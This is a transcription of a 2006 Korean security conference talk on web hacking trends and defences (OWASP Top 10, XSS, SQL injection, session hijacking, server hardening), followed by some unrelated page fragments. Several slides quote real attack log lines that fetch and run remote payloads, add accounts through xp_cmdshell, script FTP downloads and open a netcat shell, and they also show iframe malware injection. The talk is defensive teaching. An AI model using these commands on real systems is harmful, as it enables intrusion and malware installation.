Microsoft PowerPoint - 정관진_PPT_final.ppt
|
|
- 은아 황보
- 6 years ago
- Views:
Transcription
1 제 7 회한국자바개발자컨퍼런스 Java Way : Communication and Participation 웹해킹 (Web Hacking) 의현황과대처방안 정관진안철수연구소 intexp@ahnlab.com 2006년 2월 25일 2006 JavaCommunity.Org All Rights Reserved. 1
2 Overview 웹해킹무엇이문제인가? 웹환경의다양한위협요소 시큐리티트랜드의변화그리고최근의웹해킹 웹해킹의위협사례소개 홈페이지변조 취약점을이용한해킹 악성코드의위협 웹해킹의주요기술과대처 웹애플리케이션의주요취약점과공격기법 웹해킹의각주요기법소개 웹서버의보안대책 안전한웹서비스환경의구현 2
3 웹운영의기본요소 하드웨어 소프트웨어 관리 보안 비용 외부의수많은 위협으로부터 안전한가? 내용 3
4 웹운영환경의다양한위협 다양한웹공격으로부터노출 - 홈페이지변조 - 서비스거부공격 (Denial of Service) - 버퍼오버플로우 - 파일삭제 - 트로이목마, 웜과같은악성코드 - XSS, SQL Injection 웹사이트와웹애플리케이션의빠른증가추세 미들웨어, 데이터베이스등웹운영환경이더욱복잡, 다양해지고있음 비즈니스및많은산업군의웹에대한의존도증가 웹사이트증가만큼위협범위는더욱넓어질수있다. 해커들의공격대상으로웹 (Web) 이주요타깃 4
5 시큐리티트랜드의변화 IT 인프라변화를최대한활용 지속적인공격기법의발달 공격도구의지능화 5
6 웹해킹의현실 CSI/FBI 2005 Computer Crime and Security Survey 명의응답자중 95% 가 10 번이상의웹관련보안사고를겪음 - 10 회이내는전체의 5% 공격의 80% 이상 80 번포트 를대상으로이뤄지고있다. 6
7 왜웹해킹이증가하는가? 일반적으로방화벽에서 80, 443 번포트는허용된다. 즉, 다른포트번호가차단되었다하더라도이포트번호는외부에서는유효하다. HTTP 프로토콜은가장범용적으로사용되는프로토콜중의하나이다. 많은지식을필요로하지않으며 URL 상의간단한조작및유추등으로도가능하다. 많은도구를필요로하지않는다. 즉, 웹브라우저하나만으로도가능하게한다. 그렇다면방화벽과같은보안장치가모든보안수준을만족시켜주는가? URL Web Client X X X 다른포트의접속은차단 방화벽 정책 웹서비스를위한 80, 443 번오픈 제 7회한국자바개발자컨퍼런스 - Java Way : 7 Web Server Apache IIS Netscape 응용프로그램 응용프로그램 응용프로그램 JSP,ASP Perl C,C++ MSSQL Oracle MySQL DB
8 웹서비스의다양한위협 웹을통해어떠한위협들이존재하는가? Attacker 외부 Spoofing Brute Force DoS, DDoS Scanning 악성코드 X X X 다른포트의접속은차단 방화벽 정책 웹서비스를위한 80, 443 번오픈 Sniffing 내부 Web Server Buffer Overflow Session Hijacking Directory Traversal Fingerprinting 응용프로그램 응용프로그램 응용프로그램 DB XSS Buffer Overflow 입력체크오류 SQL Injection Injection Flaw 8
9 보안취약점현황 지속적으로취약점보고건수는증가하고있으며 NVD 경우는 2004 년에서 2005 년그수치가 96% 만큼증가하였다. 이러한주된증가에웹애플리케이션에대한취약점이증대되었기때문이다 CERT/CC 5,990 3,780 3,784 4,129 2,437 NVD 4,584 2,340 1,248 1,943 1,672 OSVDB 7,187 4,629 2,632 2,184 1,656 Symantec 3,766 2,691 2,676 2,604 1,472 * Computer Emergency Response Team Coordination Center(CERT/CC) National Vulnerability Database Open-Source Vulnerability Database 9
10 위협사례소개 10
11 2004 년 12 월 2004 년 11 월 홈페이지변조 웹사이트증가와함께홈페이지변조해킹증가 해킹의주된이유와공격방법은무엇인가? Heh...just for fun! Revenge against that website Political reasons As a challenge I want to be the best defacer Patriotism Attack technical details 년 7 월 2002 년 9 월 2002 년 11 월 2003 년 1 월 2003 년 3 월 2003 년 5 월 2003 년 7 월 2003 년 9 월 2003 년 11 월 2004 년 1 월 2004 년 3 월 2004 년 5 월 2004 년 7 월 2004 년 9 월 2004 년 11 월 년 7 월 2002 년 8 월 2002 년 9 월 2002 년 10 월 2002 년 11 월 2002 년 12 월 2003 년 1 월 2003 년 2 월 2003 년 3 월 2003 년 4 월 2003 년 5 월 2003 년 6 월 2003 년 7 월 2003 년 8 월 2003 년 9 월 2003 년 10 월 2003 년 11 월 2003 년 12 월 2004 년 1 월 2004 년 2 월 2004 년 3 월 2004 년 4 월 2004 년 5 월 2004 년 6 월 2004 년 7 월 2004 년 8 월 2004 년 9 월 2004 년 10 월 출처 : 11 known vulnerability (unpatched system) undisclosed (new) vulnerability configuration administration mistake brute force attack social engineering
12 홈페이지변조사례 #1 이라크전쟁당시홈페이지변조급증 전쟁에반대하는정치적인형태의해킹 해킹대상은취약한웹서버를대상으로이루어짐 ( 누구나공격의대상이될수있었음 ) 12
13 홈페이지변조사례 #2 웹사이트변조는대량으로일어나고있음 왜이러한변조가지속적으로반복되고있을까? 13
14 제로보드 (ZeroBoard) 의취약점악용 많이사용되고있는소프트웨어의취약점을악용 공격여부의확인 [05/Mar/2005:14:48: ] "GET / dir= &cmd=id;cd%20/tmp;get%20www.derf.hpgvip.com.br/derfbd%20>%20derfbd; chmod%204777%20derfbd;./derfbd HTTP/1.1" [23/Feb/2005:18:24: ] "GET /victim.net/solarpia.php?page= wget%20frag.pro.br/deadcow/i%20-o%20/var/tmp/.i;perl%20/var/tmp/.i HTTP/1.0" [23/Feb/2005:18:24: ] "GET /victim.net/solarpia.php?page= wget%20frag.pro.br/deadcow/bot%20- O%20/var/tmp/.bset;perl%20/var/tmp/.bset;touch%20/var/tmp/.bst HTTP/1.0"
15 Web Shell: 여러분의시스템을통제한다! 웹쉘을이용하여공격자는원하는명령어수행이가능하다. 다양한웹쉘이존재 -ASP, JSP, PHP - 특히중국해커들에개발된웹쉘의종류가많음 15
16 로그파일이수상하다 악의적명령을수행한웹로그어떠한부분에이상한점이존재하나? [Sat Oct 22 10:16: ] [error] [client XX] request failed: erroneous characters after protocol string: GET /write.php?dir= -a;id HTTP/1.0 [Thu Dec 29 16:36: ] [error] [client XX] request failed: erroneous characters after protocol string: GET /mambo/index2.php?_request[option]=com_content&_request[itemid]=1&globals=&mosconfig_absolute_path= /cmd.gif?&cmd=cd%20/tmp;wget% /micu;chmod%20744%20micu;./micu;echo%20YYY;echo HTTP\x01.1 [Thu Dec 29 16:36: ] [error] [client XX] request failed: erroneous characters after protocol string: GET /cvs/index2.php?_request[option]=com_content&_request[itemid]=1&globals=&mosconfig_absolute_path= /cmd.gif?&cmd=cd%20/tmp;wget% /micu;chmod%20744%20micu;./micu;echo%20YYY;echo HTTP\x01.1 [Thu Dec 29 16:36: ] [error] [client XX] request failed: erroneous characters after protocol string: GET /cvs/mambo/index2.php?_request[option]=com_content&_request[itemid]=1&globals=&mosconfig_absolute_path=http :// /cmd.gif?&cmd=cd%20/tmp;wget% /micu;chmod%20744%20micu;./micu;echo%20YYY;echo HTTP\x01.1 SQL Injection 공격 XX [26/Aug/2005:11:49: ] "GET /tools/ctss.idc?ds=localserver&user=sa&pwd=&table=ngt(ng%20int);exec+master..xp_cmdshell(\"cmd.exe+/c%20dir\");-- HTTP/1.0" XX [26/Aug/2005:11:49: ] "GET /cgi- bin/tools/ctss.idc?ds=localserver&user=sa&pwd=&table=ngt(ng%20int);exec+master..xp_cmdshell(\"cmd.exe+/c%20dir\");-- HTTP/1.0"
17 IFRAME 과취약점의이용 여러분의웹페이지는안전한가? 아니면단순히안전하다고생각하는가? 어떤이유로 [ 초기인코딩된데이터 ] 17 [ 일부를해독한화면 ]
18 취약점을이용한악성코드의위협 XML-RPC 취약점을통해전파되는웜 POST 형식으로 xml-rpc 를사용하는.php 를통해 injection 한다. <?xml version="1.0"?><methodcall><methodname>test.method</methodname><params><param><value><name> ',''));echo '_begin_';echo `cd /tmp; //' 를이용한코드끼워넣기후 /tmp 디렉토리로이동 wget xxx.xxx/lupii; // wget으로특정사이트의 lupii 파일다운로드 chmod +x lupii; // 실행으로변경./lupii xxx.xxx // 웜실행 `;echo '_end_';exit;/*</name></value></param></params></methodcall> [ 웹서버로그 ] xx [17/Jan/2006:18:37: ] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" xx [17/Jan/2006:18:37: ] "POST /drupal/xmlrpc.php HTTP/1.1" xx [17/Jan/2006:18:37: ] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 코드레드 (CodeRed) 공격에기록되는로그 [30/Jul/2004:17:32: ] "GET /default.ida?xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u000 3%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" "-" "- Slapper 웜 [Sat Sep 14 18:10: ] [error] [client XX.XX.XX.XX] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): / [Sat Sep 14 18:10: ] [error] mod_ssl: SSL handshake failed (server XX.XX.XX.XX:443, client XX.XX.XX.XX) (OpenSSL library error follows) [Sat Sep 14 18:10: ] [error] OpenSSL: error:1406b458:lib(20):func(107):reason(1112) 18
19 웹해킹공격도구 WED(Web Entry Detector) WIS(Web Injection Scanner) 19
20 웹해킹의주요기술과대처 20
21 웹애플리케이션주요취약점 OWASP 에서발표한웹의주요Top 10 ⑴ 입력값검증부재 (Unvalidated Input) ⑵ 취약한접근통제 (Broken Access Control) ⑶ 취약한인증및세션관리 (Broken Authentication and Session Management) ⑷ XSS(Cross Site Scripting) 취약점 ⑸ 버퍼오버플로우 (Buffer Overflows) ⑹ 삽입취약점 (Injection Flaws) ⑺ 부적절한에러처리 (Improper Error Handling) ⑻ 취약한정보저장방식 (Insecure Storage) ⑼ 서비스방해공격 (Denial of Service) ⑽ 부적절한환경설정 (Insecure Configuration Management) 21
22 주요웹해킹테크닉 Web Fingerprinting 잘못된설정의이용 URL 조작 디렉토리, 소스코드, HTML 정보노출 입력체크 웹파일이외의파일다운로드및추측 Buffer Overflow Session Hijacking ( 쿠키조작 ) Cross Site Scripting SQL Injection 22
23 About Attackers 공격자의동기 - 단순재미 - 영웅심리 - 금전적목적 공격자는사전에무엇을먼저준비할것인가? - 공격대상의정보획득 - 취약점검토 공격도구의준비 - 인터넷연결환경 - 웹브라우저 - 필요에따라고급도구 내가만일해커라면 23
24 Web Fingerprinting 아무정보도없이시작할것인가? 공격대상의선정과정보획득 - Port Scanner( nmap, fscan, etc..) nmap -p 80,81,443,8000, 웹서버소프트웨어파악 nc ; HEAD / HTTP/1.0 -Netcat -Whois - Vulnerability Checking 구글해킹 (Google Hacking) - 보안권고문, 운영소프트웨어및응용프로그램의취약점검색 - 많은정보가포함된에러메시지 - 숨겨진디렉토리 - 파이어월, 웹서버로그등이포함된페이지 - 패스워드가포함되어있는파일 - inurl, site 등의고급검색어활용 24
25 잘못된설정의이용 부적절한패스워드사용및기본계정사용 admin/admin, manager/manger, system/system, admin/djemals, root/root 관리자 / 개인용페이지접근제한노출 검색엔진을통해 3 분여동안찾을수있었던사이트는? /admin, /manage, 관리자, 관리자모드등의단순검색어이용 25
26 디렉토리, 소스코드, HTML 정보노출 소프트웨어취약점으로인한소스코드노출 -WebLogic/WebSphere JSP 버그로인하여 JSP/JHTML 파일의소스코드보는것이가능 (URL 상에서 JSP 대문자를사용하면소스코드볼수있었음 ) - 아파치톰캣 사이의버전에서소스노출 HTTP/1.0 or HTTP/1.1 없이 GET 요청시소스노출 ( 톰캣 4.0-b1) - 특정경로에서소스코드노출 /servlet/file/ (IBM WebSphere) /file/ (BEA WebLogic) /*.shtml/ (BEA WebLogic) /ConsoleHelp/ (BEA WebLogic) /servlet/com.sun.server.http.servlet.fileservlet/ (Sun JavaWebServer) 웹서버의설정잘못으로인한디렉토리노출 - 뜻하지않게중요파일및소스코드노출 HTML 안에기록되어있는정보활용 - 웹개발시입력한 Comment 활용 26
27 입력값검증 (Input Validation) 다음의입력값검증 데이터타입 (string, integer, real, etc ) 허용하는문자최소, 최대문자열길이널 (Null) 허용유무파라미터가필요유무중복을허용하는가숫자의범위특정패턴 ( 정규표현식 ) 위험한 HTML 태그들 <APPLET>,<BODY>,<EMBED>,<FRAME> <FRAMESET>,<HTML>,<IFRAME>,<IMG> <LAYER>,<ILAYER>,<META>,<OBJECT> <SCRIPT>,<STYLE> $ % ^ & * ( ) -_ + ` ~ \ [ ] { } ; : ' "? /,. > < 클라이언트의입력을신뢰하지마라 J2EE 플랫폼의경우 OWASP 에서배포하는 J2EE HTTP Validation Engine 이있음 아파치웹서버의경우 modsecurity 의모듈이용 27
28 버퍼오버플로우 (Buffer Overflow) 버퍼오버플로우위협 - 웹서버소프트웨어 - 웹애플리케이션 - 미들웨어 - 데이터베이스 - 브라우저 버퍼오버플로우예방 - Secure Programming 고려 Boundary Check - 웹서버의경우 / 요청제한 - LimitRequestBody LimitRequestFields 40 - LimitRequestFieldsize LimitRequestLine mod_parmguard 해커로부터입력되는데이터의필터를통하여스크립트를보호 - 이외 StackGuard 등운영체제별보호체계 28
29 Session Hijacking HTTP 는 Stateless 프로토콜이다. 많은웹애플리케이션은 stateful 형식이다. 세션 ID 는보안상취약한메커니즘을가지고있다. - Hidden Field 에의해 Session ID 전달 <input type="hidden" name="useraccount" value= > - 클라이언트사이드의쿠키 - URL Stored Session ID J4CCQCQBJCGWQKAKAFUIV0?_requestid=21122 취약한세션관리에대한대처방법 - 사용자쿠키정보암호화 (SSL) - 세션에대한 Timeout 설정 - 인증후에도중요정보수정, 입력은재인증을거치는프로세스 - Server Side Session 의사용 29
30 Session Hijacking Attack Hijacking Session 의주요공격방법 - 무작위입력, 유추 - 계산된공식에의해세션 ID 유추 - 가로채기 무작위 Session ID 유추를통한접근 또는자동화된도구의활용 30
31 XSS(Cross Site Scripting) Cross Site Scripting 이란? XSS 는웹애플리케이션에서입력되는데이터를적절하게검사하지않아클라이언트의스크립트나 HTML 태그의사용이가능하게되는데이것은의도적으로악의적인형태의공격으로까지이어질수있다. XSS 용어의혼돈고정된 HTML 을자유롭게쓰게해주는 CSS(Cascading Style Sheets) 와혼동되어사용될수있기때문에 XSS 라고많이불리고있다. CSS : Cascading Style Sheet XSS : Cross Site Scripting Cross Site Scripting 이라는이름에서도알수있듯이다양한플랫폼에걸쳐사용이가능 XSS 는많은웹애플리케이션에그문제가존재하고있으며, 버퍼오버플로우 (Buffer Overflow) 와같이직접적으로시스템의권한을획득하는것은아니지만간접적또는다양한형태로악용될우려가높다. 공격자는 HTML, JavaScript, VBScript, ActiveX 또는 Flash를이용하여취약한웹애플리케이션을통한사용자정보의수집, 사용자계정의탈취, 정보의변경, 쿠키정보획득 / 변조, 부정확한정보제공등악용가능한범위가넓다. 31
32 XSS 취약점존재유무체크 XSS 취약점존재여부체크 - HTML 입력폼또는 URL 상에스크립트를입력 입력폼에 <script>alert( hello )</script>, <script>alert(document.cookie)</script> 사용또는 </script> 와같이 URL 직접입력 <script>alert('is your site vulnerable?')</script> XSS 의방지 - Secure Development Input validation 특정캐릭터필터 - Intrusion Prevention mod security ( - 사용자의인지 32
33 XSS 를이용한 웜 소개 2005 년 10 월 4 일 XSS 를이용한첫웜사례보고 ( Samy ) - CSS(Cascading Style Sheet) 태그안에서자바스크립트사용가능한것을발견 - Myspace.com 의백만명이넘는사람들이본인의의지와는상관없이친구추가요청 - 사이트는일시적서비스장애겪음, DoS 가능성을보여주었음 시간 10월04일 12:34 PM 10월04일 01:30 AM 10월04일 08:35 AM 10월04일 09:30 AM 10월04일 10:30 AM 10월04일 01:30 PM 10월04일 06:20 PM 친구수 친구등록요청자 , ,084 경과시간 1시간 8시간 9시간 10시간 13시간 18시간 비고 3 초후 918,268 이후다시 3 초후 919,664. 몇분후 1,005,831 명까지도달 33
34 SQL Injection SQL Injection 이란? - 입력되는데이터의적절한확인없이전달되는데이터를데이터베이스에서명령어로처리하는것 공격자는다음과같이악용가능 - SELECT, INSERT, DELETE 그리고 DROP TABLE 과같은 SQL 명령어수행가능 - 확장프로시저를통한임의의명령어수행가능 다음의의미는무엇일까? <form method="post" action= admin_login.php"> <input type="text" name= username"> <input type="password" name="password"> </form> "SELECT id FROM logins [ 위구문은이와같은 SQL 쿼리를요청 ] WHERE username = '$username' AND password = '$password'"; "SELECT id [ 패스워드입력구문에 OR x = x 와같이입력하여 FROM logins 인증을우회 ] WHERE username = 'Joe' AND password = 'anything' OR 'x'='x'"; 34
35 SQL Injection 공격의예 master..xp_cmdshell net user name password /add master..xp_cmdshell echo <ifrmae src= width= 0 height= 0 ></iframe> >> c:\inetpub\www\index.html ; 대책 - DB 쿼리에변수로사용되는모든인자에대한검증 - URL 인자값에 SQL 명령어금지 - 불필요한에러메시지제거 - 세미콜론, 더블데쉬 (--) 제거 -, <,>,;, -- 등의문자가변수에존재하지않도록체크 - 불필요한 Stored Procedure 제거 xp_cmdshell, xp_dirtree, xp_regdeletekey, xp_regwrite, sp_adduser... - DB 권한축소 35
36 다양한 SQL Injection 공격 'copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\' GET /theasppage.asp?anid=377';exec MASTER..xp_cmdshell 'mkdir %systemroot% system32 Macromed lolx '; exec MASTER..xp_cmdshell 'echo open z.z.z.z 21 >> %systemroot% system32 Macromed lolx blah.jkd'; exec MASTER..xp_cmdshell 'echo USER chadicka r0ckpaul >> %systemroot% system32 macromed lolx blah.jkd'; exec MASTER..xp_cmdshell 'echo binary >> %systemroot% system32 macromed lolx blah.jkd'; exec MASTER..xp_cmdshell 'echo get lol.exe %systemroot% system32 Macromed lolx arcdlrde.exe >> %systemroot% system32 Macromed lolx blah.jkd'; exec MASTER..xp_cmdshell 'echo quit >> %systemroot% system32 Macromed lolx blah.jkd'; exec MASTER..xp_cmdshell 'ftp.exe -i -n -v -s:%systemroot% system32 Macromed lolx blah.jkd'; exec MASTER..xp_cmdshell 'del %systemroot% system32 Macromed lolx blah.jkd'; exec MASTER..xp_cmdshell '%systemroot% system32 Macromed lolx arcdlrde.exe'-- tftp+-i get+nc.exe+%26%26+nc+-e+cmd.exe
37 SQL Injection 도구 사용하기쉬운 GUI 방식의 SQL Injection 도구들존재 중국에서제작된도구가많음 37
38 서비스거부공격 (DoS) 서비스거부공격은웹서비스운영에큰위협 - DoS(Denial of Service) - DDoS, DRDoS 2000 년 2 월 Buy.com, ebay, CNN, Yahoo, Amazon 대형사이트 DDoS 공격 웜, 트로이목마를이용한특정사이트공격형태가나타남. 이러한트로이목마들은향후분산서비스거부공격등에이용될확률이높음 뚜렷한해결방법이존재하지않음 대처방법 - 웹서버성능관련지시어조절 - 대역폭관리모듈사용 -mod_bandwidth - mod_throttle - 웹서버앞단에서의조절 ( 라우터, 방화벽 ) - 방화벽의대역폭조절및자체적인 DoS 솔루션 - 시스코사의 CAR(Committed Access Rate), QoS 38
39 악성코드와웹환경 악성코드가웹서비스영역으로까지확대되며다양한방법을이용 - 웹서버소프트웨어나주요기능의취약점을이용하여확산 - 웹페이지에 IFRAME 태그등을삽입 -XSS 웜발견 악성코드사례 - OpenSSL 취약점을이용한아파치웜 Slapper - Microsoft IIS 취약점을이용한 CodeRed, Nimda - PHP-XMLRPC 취약점이용한웜 - phpbb 이하버전의취약점을이용한 PERL/Santy 웜 - XSS 취약점이용하여 myspace.com 에서전파 (samy worm) 왜악성코드가웹환경을이용하고있는가? 39
40 중국발웹해킹증가 IFRAME 태그를이용하여웹페이지에삽입하는해킹증가 사이트를방문하는것만으로도쉽게감염되어최근웹해킹의주요공격방법으로사용되고있음 최근에는 MS06-001(WMF) 의취약점을이용한공격증가 금전적이득을노림 [ 웹서버에삽입되어있는내용 ] <iframe height=0 width=0 src=" <OBJECT Width=0 Height=0 style="display:none;" type="text/x-scriptlet data="mk:@msitstore:mhtml:c:\.mht!htt_://wyd.gamefor.c om/job/help.txt: :/%23%2E%68%74m"></OBJECT>... 40
41 웹서버의보안대책 서버정보출력의제한 -ServerSignatureOff -ServerTokensProductOnly - 디렉토리인덱스출력 ( Options Indexes ) 웹서버권한설정 - root 권한동작금지, 기본적으로최소한의권한부여 - 사용용도에따라적절한권한부여 - chroot 환경의운영 스크립트실행영역제한 접근제어 ( 디렉토리, 호스트별 ), 파일정보의제한 (.htaccess) 사용자인증을통한보안강화 불필요한모듈의제거 웹서버의상태관찰을통한공격파악 웹서버로그파일의감사 - 로그파일에기록되는비이상적인요청이있는가? 최신의웹서버소프트웨어사용및패치적용 추가적인보안관련모듈사용을통한보안성향상 이외운영되는웹서버에따른적절한보안지침마련 41
42 안전한웹서비스 이제웹서비스운영뿐만아니라클라이언트의보안대책도필요 현재의보안은한쪽면만이아닌복합적인방어대책필요 기본적인보안정책만으로도많은공격으로부터안전해질수있다. 보안패치 Anti-Virus, Personal Firewall Anti-Key Logging 방화벽 IPS,IDS Application Firewall 응용프로그램 불필요한확장프로시저제거 Web Client Inbound 정책 다른포트의접속은차단 X X X Outbound 정책 X 올바른보안정책수립 80, 443 번오픈 Web Server SSL or 보안모듈이용암호화 응용프로그램 응용프로그램 Code Review 입력값검증보안을고려한코딩 DB 42
43 안전한웹환경을위해무엇을해야하는가? 빠르게변화하는다양한인터넷기술과공격방법등의변화를따라가라 보안관련메일링리스트와사이트를통해웹서버또는웹애플리케이션의보안취약점정보를인지하라 웹운영에심각한취약점인경우빠르게업데이트할수있도록한다. 안전한웹서버의운영을원한다면본인스스로가보안에대한중요성을인지하고지속적인관심을가지고더욱더안전한운영방법을위한노력이필요하다. 보안 은단한번의설정으로 이뤄지지않는다. 43
44 Questions? Tha nks for your a tte ntion 44
제목 레이아웃
웹해킹이라고무시하는것들보소 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM SQL Injection 끝나지않은위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM Who am I 정도원 aka rubiya Penetration tester Web application bughuter Pwned 20+ wargame @kr_rubiya
More information<3035303432365FC8A8C6E4C0CCC1F620B0B3B9DF20BAB8BEC8B0A1C0CCB5E5C3D6C1BE28C0FAC0DBB1C7BBE8C1A6292E687770>
개 요 홈페이지 해킹 현황 및 사례 홈페이지 개발시 보안 취약점 및 대책 주요 애플리케이션 보안 대책 결 론 참고자료 [부록1] 개발 언어별 로그인 인증 프로세스 예제 [부록2] 대규모 홈페이지 변조 예방을 위한 권고(안) [부록3] 개인정보의 기술적 관리적 보호조치 기준(안) [부록4] 웹 보안관련 주요 사이트 리스트 7000 6,478 6000 5000
More informationOracle hacking 작성자 : 임동현 작성일 2008 년 10 월 11 일 ~ 2008 년 10 월 19 일 신규작성 작성내용
Oracle hacking 작성자 : 임동현 (ddongsbrk@naver.com) 작성일 2008 년 10 월 11 일 ~ 2008 년 10 월 19 일 신규작성 작성내용 Skill List 1. Oracle For Pentest 1. Find TNS Listener (Default 1521 port) (with nmap or amap) 2. Get the
More informationSecure Programming Lecture1 : Introduction
Malware and Vulnerability Analysis Lecture4-1 Vulnerability Analysis #4-1 Agenda 웹취약점점검 웹사이트취약점점검 HTTP and Web Vulnerability HTTP Protocol 웹브라우저와웹서버사이에하이퍼텍스트 (Hyper Text) 문서송수신하는데사용하는프로토콜 Default Port
More informationObservational Determinism for Concurrent Program Security
웹응용프로그램보안취약성 분석기구현 소프트웨어무결점센터 Workshop 2010. 8. 25 한국항공대학교, 안준선 1 소개 관련연구 Outline Input Validation Vulnerability 연구내용 Abstract Domain for Input Validation Implementation of Vulnerability Analyzer 기존연구
More information다른 JSP 페이지호출 forward() 메서드 - 하나의 JSP 페이지실행이끝나고다른 JSP 페이지를호출할때사용한다. 예 ) <% RequestDispatcher dispatcher = request.getrequestdispatcher(" 실행할페이지.jsp");
다른 JSP 페이지호출 forward() 메서드 - 하나의 JSP 페이지실행이끝나고다른 JSP 페이지를호출할때사용한다. 예 ) RequestDispatcher dispatcher = request.getrequestdispatcher(" 실행할페이지.jsp"); dispatcher.forward(request, response); - 위의예에서와같이 RequestDispatcher
More information** 5 개이발생한주요소프트웨어별취약점세 EDB 번호취약점종류공격난이도공격위험도취약점이름소프트웨어이름
EDB 분석보고서 (016.01) 016.01.01~016.01.31 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 016 년 1 월에공개된 Exploit-DB 의분석결과, SQL Injection 공격에대한취약점보고개수가가장많았습니다. 분석된 SQL Injection
More informationPowerPoint 프레젠테이션
Synergy EDMS www.comtrue.com opyright 2001 ComTrue Technologies. All right reserved. - 1 opyright 2001 ComTrue Technologies. All right reserved. - 2 opyright 2001 ComTrue Technologies. All right reserved.
More informationPowerPoint Template
설치및실행방법 Jaewoo Shim Jun. 4. 2018 Contents SQL 인젝션이란 WebGoat 설치방법 실습 과제 2 SQL 인젝션이란 데이터베이스와연동된웹서버에입력값을전달시악의적동작을수행하는쿼리문을삽입하여공격을수행 SELECT * FROM users WHERE id= $_POST[ id ] AND pw= $_POST[ pw ] Internet
More informationuntitled
웹쉘의현황및분석 2007. 2. 본보고서의전부나일부를인용시반드시 [ 자료 : 한국정보보호진흥원 (KISA)] 를명시하여주시기바랍니다. 1. 개요 일반적으로웹서비스에는게시판이나자료실과같은파일을첨부하는기능을포함한다. 이때 txt, jpg, doc와같은데이터파일종류이외에악의적으로제작된스크립트파일인웹쉘을업로드하여해킹하는사고가빈번히발생하고있다. 이와같이서버명령을실행할수있는
More informationUDP Flooding Attack 공격과 방어
황 교 국 (fullc0de@gmail.com) SK Infosec Co., Inc MSS Biz. Security Center Table of Contents 1. 소개...3 2. 공격 관련 Protocols Overview...3 2.1. UDP Protocol...3 2.2. ICMP Protocol...4 3. UDP Flood Test Environment...5
More informationMicrosoft Word - SKINFOSEC-CHR-026- Mass SQL Injection 탐지 우회분석 보고서.doc
분석보고서 이동현 (dhclub20@naver.com) SK Infosec Co., Inc MSS 사업본부침해대응팀모의해킹파트 Table of Contents 1. 개요... 3 1.1. 배경... 3 1.2. 목적... 3 2. 공격분석... 4 2.1. Cookie Injection... 4 2.2. Cookie Injection의발생원인... 5 2.3.
More information슬라이드 1
2006 Security Trend & Threat 중국발해킹의발전과대응 2006.10.24 전상훈 [p4ssion] -Agenda - I. Security Trend 환경의변화 위협요소 Security의변화 공격유형의변화 II. 대응 I. Security Trend - 환경의변화 취약성및공격기술발전에따른정보보호기술의발전유형 Vulnerability & Attack
More informationPowerPoint 프레젠테이션
SECUINSIDE 2017 Bypassing Web Browser Security Policies DongHyun Kim (hackpupu) Security Researcher at i2sec Korea University Graduate School Agenda - Me? - Abstract - What is HTTP Secure Header? - What
More informationÀÎÅÍ³Ý ÁøÈï¿ø 5¿ù
21 5 Korea Internet & Security Agency CONTENTS 2 3 3 3 4 4 5 6 6 7 7 8 11 12 14 14 15 15 16 18 2 22 23 24 24 32 35 36 2 215 Bot 1,7511,315 33.2% 1,621,468 27.7% 285 431 33.9% 295 12 6.9% 44 396 2.% 132
More informationPowerPoint 프레젠테이션
HTML5 웹프로그래밍입문 부록. 웹서버구축하기 1 목차 A.1 웹서버시스템 A.2 PHP 사용하기 A.3 데이터베이스연결하기 2 A.1 웹서버시스템 3 웹서버의구축 웹서버컴퓨터구축 웹서버소프트웨어설치및실행 아파치 (Apache) 웹서버가대표적 서버실행프로그램 HTML5 폼을전달받아처리 PHP, JSP, Python 등 데이터베이스시스템 서버측에데이터를저장및효율적관리
More informationAhnLab_template
해킹과침해대응 웹해킹과대응 2013. 10. 17 ( 목 ) 안랩 ASEC 대응팀문영조 Contents 01 웹해킹과취약점 02 웹해킹기법에대한이해 03 웹해킹과침해대응 04 결론 01 웹해킹과취약점 개요 01. 웹해킹과취약점 < 출처 - IBM X-Force 2012 Annual Trend & Risk Report> 4 개요 01. 웹해킹과취약점 웹해킹 (Web
More informationSKINFOSEC-CHR-028-ASP Mssql Cookie Sql Injection Tool 분석 보고서.doc
Asp Mssql Sql Injection Tool 분석보고서 이재곤 (x0saver@gmail.com) SK Infosec Co., Inc MSS 사업본부 / 침해대응센터모의해킹파트 Table of Contents 1. 개요... 3 2. 구성... 3 3. 분석... 4 3.1. 기능분석... 4 4. 공격원리...14 4.1 기본공격원리...14 4.2
More informationuntitled
Oracle DBMS 로그인의접근제어우회 취약점분석 2006. 2. 9 인터넷침해사고대응지원센터 (KISC) 본보고서의전부나일부를인용시반드시 [ 자료 : 한국정보보호진흥원 (KISA)] 룰명시하여주시기바랍니다. 개요 o 2005년이후 Oracle Critical Patch Update(CPU) 는 Oracle사제품대상으로다수의보안패치및보안패치와관련된일반패치를발표하는주요수단임
More informationIntro to Servlet, EJB, JSP, WS
! Introduction to J2EE (2) - EJB, Web Services J2EE iseminar.. 1544-3355 ( ) iseminar Chat. 1 Who Are We? Business Solutions Consultant Oracle Application Server 10g Business Solutions Consultant Oracle10g
More informationSQL Developer Connect to TimesTen 유니원아이앤씨 DB 기술지원팀 2010 년 07 월 28 일 문서정보 프로젝트명 SQL Developer Connect to TimesTen 서브시스템명 버전 1.0 문서명 작성일 작성자
SQL Developer Connect to TimesTen 유니원아이앤씨 DB 팀 2010 년 07 월 28 일 문서정보 프로젝트명 SQL Developer Connect to TimesTen 서브시스템명 버전 1.0 문서명 작성일 2010-07-28 작성자 김학준 최종수정일 2010-07-28 문서번호 20100728_01_khj 재개정이력 일자내용수정인버전
More informationTTA Journal No.157_서체변경.indd
